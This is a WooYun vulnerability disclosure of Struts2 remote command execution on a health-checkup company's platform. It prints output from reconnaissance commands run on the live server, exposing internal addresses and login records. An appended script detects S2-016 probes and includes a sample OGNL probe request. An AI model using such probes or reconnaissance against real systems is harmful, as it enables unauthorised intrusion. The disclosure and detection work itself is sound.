
Vulnerability summary

Defect ID: wooyun-2014-074384

Title: Remote command execution vulnerability in the Ciming Checkup Group (慈铭体检集团) cloud health management platform

Vendor: Ciming Checkup Group (慈铭体检集团)

Author: 猪猪侠

Submitted: 2014-08-29 20:32

Fix deadline: 2014-10-13 20:34

Disclosed: 2014-10-13 20:34

Type: command execution

Severity: high

Self-assessed rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-08-29: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-10-13: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Remote command execution vulnerability in the Ciming Checkup Group cloud health management platform
Now even checkup companies are on the cloud...

Details:

# Vulnerable site
http://health.ciming.com/loginMessage.action

(screenshot: ciming.jpg)


Proof of vulnerability:

(screenshot: ciming2.jpg)


>whoami
gpmsuser
>ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:56:83:57:6D
inet addr:10.10.12.41 Bcast:10.10.12.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe83:576d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:32863746 errors:0 dropped:0 overruns:0 frame:0
TX packets:96947840 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7805494566 (7.2 GiB) TX bytes:59550582633 (55.4 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:502 errors:0 dropped:0 overruns:0 frame:0
TX packets:502 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29960 (29.2 KiB) TX bytes:29960 (29.2 KiB)
>cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.10.12.41 GaiRuiApp01
58.247.75.246 api.ykservice.com
10.2.201.41 www.wincome.org
10.2.201.41 pns.gareahealth.com
>last -10
root pts/1 10.1.6.50 Wed Aug 27 10:10 - 10:41 (00:30)
root pts/1 10.1.6.50 Wed Aug 27 09:25 - 09:54 (00:29)
root pts/1 10.1.6.50 Mon Aug 25 16:45 - 19:03 (02:18)
root pts/1 10.1.6.50 Mon Aug 25 10:57 - 11:00 (00:02)
root pts/1 10.1.6.50 Mon Aug 25 08:16 - 08:22 (00:06)
root pts/1 10.1.6.50 Fri Aug 15 17:00 - 17:07 (00:07)
root pts/1 10.1.6.50 Fri Aug 15 15:53 - 16:45 (00:51)
root pts/1 10.1.6.50 Fri Aug 15 15:24 - 15:28 (00:03)
root pts/1 10.1.6.50 Fri Aug 15 08:25 - 08:26 (00:01)
root pts/0 10.10.10.22 Tue Aug 12 09:08 still logged in
wtmp begins Thu Jun 26 21:04:55 2014
>ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jul30 ? 00:00:02 /sbin/init
root 2 0 0 Jul30 ? 00:00:00 [kthreadd]
root 3 2 0 Jul30 ? 00:00:00 [migration/0]
root 4 2 0 Jul30 ? 00:00:35 [ksoftirqd/0]
root 5 2 0 Jul30 ? 00:00:00 [migration/0]
root 6 2 0 Jul30 ? 00:00:04 [watchdog/0]
root 7 2 0 Jul30 ? 00:00:00 [migration/1]
root 8 2 0 Jul30 ? 00:00:00 [migration/1]
root 9 2 0 Jul30 ? 00:00:28 [ksoftirqd/1]
root 10 2 0 Jul30 ? 00:00:03 [watchdog/1]
root 11 2 0 Jul30 ? 00:01:47 [events/0]
root 12 2 0 Jul30 ? 00:02:36 [events/1]
root 13 2 0 Jul30 ? 00:00:00 [cgroup]
root 14 2 0 Jul30 ? 00:00:00 [khelper]
root 15 2 0 Jul30 ? 00:00:00 [netns]
root 16 2 0 Jul30 ? 00:00:00 [async/mgr]
root 17 2 0 Jul30 ? 00:00:00 [pm]
root 18 2 0 Jul30 ? 00:00:11 [sync_supers]
root 19 2 0 Jul30 ? 00:00:13 [bdi-default]
root 20 2 0 Jul30 ? 00:00:00 [kintegrityd/0]
root 21 2 0 Jul30 ? 00:00:00 [kintegrityd/1]
root 22 2 0 Jul30 ? 00:00:15 [kblockd/0]
root 23 2 0 Jul30 ? 00:00:13 [kblockd/1]
root 24 2 0 Jul30 ? 00:00:00 [kacpid]
root 25 2 0 Jul30 ? 00:00:00 [kacpi_notify]
root 26 2 0 Jul30 ? 00:00:00 [kacpi_hotplug]
root 27 2 0 Jul30 ? 00:16:26 [ata/0]
root 28 2 0 Jul30 ? 00:04:40 [ata/1]
root 29 2 0 Jul30 ? 00:00:00 [ata_aux]
root 30 2 0 Jul30 ? 00:00:00 [ksuspend_usbd]
root 31 2 0 Jul30 ? 00:00:00 [khubd]
root 32 2 0 Jul30 ? 00:00:00 [kseriod]
root 33 2 0 Jul30 ? 00:00:00 [md/0]
root 34 2 0 Jul30 ? 00:00:00 [md/1]
root 35 2 0 Jul30 ? 00:00:00 [md_misc/0]
root 36 2 0 Jul30 ? 00:00:00 [md_misc/1]
root 37 2 0 Jul30 ? 00:00:02 [khungtaskd]
root 38 2 0 Jul30 ? 00:00:21 [kswapd0]
root 39 2 0 Jul30 ? 00:00:00 [ksmd]
root 40 2 0 Jul30 ? 00:00:36 [khugepaged]
root 41 2 0 Jul30 ? 00:00:00 [aio/0]
root 42 2 0 Jul30 ? 00:00:00 [aio/1]
root 43 2 0 Jul30 ? 00:00:00 [crypto/0]
root 44 2 0 Jul30 ? 00:00:00 [crypto/1]
root 49 2 0 Jul30 ? 00:00:00 [kthrotld/0]
root 50 2 0 Jul30 ? 00:00:00 [kthrotld/1]
root 51 2 0 Jul30 ? 00:00:00 [pciehpd]
root 53 2 0 Jul30 ? 00:00:00 [kpsmoused]
root 54 2 0 Jul30 ? 00:00:00 [usbhid_resumer]
root 83 2 0 Jul30 ? 00:00:00 [kstriped]
root 246 2 0 Jul30 ? 00:00:00 [scsi_eh_0]
root 247 2 0 Jul30 ? 00:15:05 [scsi_eh_1]
root 320 2 0 Jul30 ? 00:00:00 [scsi_eh_2]
root 321 2 0 Jul30 ? 00:00:00 [vmw_pvscsi_wq_2]
root 365 2 0 Jul30 ? 00:01:17 [jbd2/sda1-8]
root 366 2 0 Jul30 ? 00:00:00 [ext4-dio-unwrit]
root 367 2 0 Jul30 ? 00:00:00 [ext4-dio-unwrit]
root 447 1 0 Jul30 ? 00:00:00 /sbin/udevd -d
root 450 2 0 Jul30 ? 00:00:59 [flush-8:0]
root 604 2 0 Jul30 ? 00:00:40 [vmmemctl]
root 959 2 0 Jul30 ? 00:00:00 [kauditd]
root 1172 1 0 Jul30 ? 00:37:45 /usr/sbin/vmtoolsd
root 1343 1 0 Jul30 ? 00:00:03 auditd
root 1368 1 0 Jul30 ? 00:00:01 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
rpc 1386 1 0 Jul30 ? 00:00:04 rpcbind
dbus 1401 1 0 Jul30 ? 00:00:00 dbus-daemon --system
avahi 1413 1 0 Jul30 ? 00:00:02

Fix recommendation:

# Patch promptly
It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html

Copyright notice: when reposting, please credit 猪猪侠@乌云
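The fix section only says "upgrade to 2.3.15.1". As an added example (not part of the WooYun report, and not code from the vendor or the Struts project), the script below shows the two checks a defender would actually run: an inventory pass that flags any struts2-core jar below 2.3.15.1, and a log pass that flags requests carrying the redirect:/redirectAction: parameter prefix with an OGNL expression, which is the S2-016 pattern documented at the advisory URL above. The jar paths, log lines and IP addresses are constructed for the example; the /loginMessage.action path is the one from the report.

```python
"""Added example: defender-side checks for the Struts2 S2-016/S2-017 issue.

1. find_unpatched_jars(): flag struts2-core jars whose version predates 2.3.15.1.
2. flag_s2016_requests(): flag access-log lines whose query string carries a
   redirect:/redirectAction: parameter holding an OGNL expression (${...} or %{...}).

All jar paths, log lines and addresses below are constructed for this example.
"""
import re
from urllib.parse import unquote

# First Struts 2.3.x release shipping the corrected struts2-core (from the fix section).
PATCHED = (2, 3, 15, 1)

# Matches e.g. struts2-core-2.3.15.jar or struts2-core-2.3.14.3-SNAPSHOT.jar
JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)*)(?:[-.][A-Za-z0-9]+)?\.jar$")


def parse_version(text):
    """'2.3.15.1' -> (2, 3, 15, 1); shorter versions are zero-padded so 2.3.15 < 2.3.15.1."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * (4 - len(parts))


def is_vulnerable_version(version):
    """True when the struts2-core version is older than the patched 2.3.15.1."""
    return parse_version(version) < PATCHED


def find_unpatched_jars(paths):
    """Return the jar paths (e.g. from a WEB-INF/lib listing) that still need the upgrade."""
    hits = []
    for path in paths:
        m = JAR_RE.search(path)
        if m and is_vulnerable_version(m.group(1)):
            hits.append(path)
    return hits


# S2-016 shape: a parameter named redirect: or redirectAction: whose value is an OGNL
# expression. Matched on the URL-decoded query string so percent-encoding does not hide it.
S2016_RE = re.compile(r"(?:^|[?&])redirect(?:Action)?:\s*[%$]\{", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_s2016_requests(log_lines):
    """Return (client_ip, request_path) for access-log lines that look like S2-016 probes."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _method, target, _status = m.groups()
        if S2016_RE.search(unquote(target)):
            flagged.append((ip, target.split("?", 1)[0]))
    return flagged


# Constructed sample inventory: one jar on the vulnerable side of the threshold, one not.
SAMPLE_JARS = [
    "/opt/app/WEB-INF/lib/struts2-core-2.3.15.jar",
    "/opt/other/WEB-INF/lib/struts2-core-2.3.15.1.jar",
    "/opt/app/WEB-INF/lib/commons-lang-2.4.jar",
]

# Constructed sample log: one benign redirect= parameter, one redirect: OGNL probe.
SAMPLE_LOG = [
    '198.51.100.4 - - [29/Aug/2014:20:31:10 +0800] "GET /loginMessage.action?redirect=/home HTTP/1.1" 200 512',
    '203.0.113.7 - - [29/Aug/2014:20:32:01 +0800] "GET /loginMessage.action?redirect:%24%7B1%2B1%7D HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print("unpatched jars:", find_unpatched_jars(SAMPLE_JARS))
    print("suspicious requests:", flag_s2016_requests(SAMPLE_LOG))
```

The version comparison pads to four components on purpose: a naive string comparison would rank "2.3.15" above "2.3.15.1", and a three-component tuple would miss the point release that actually carries the fix.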


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused

Vulnerability rank: 15 (WooYun rating)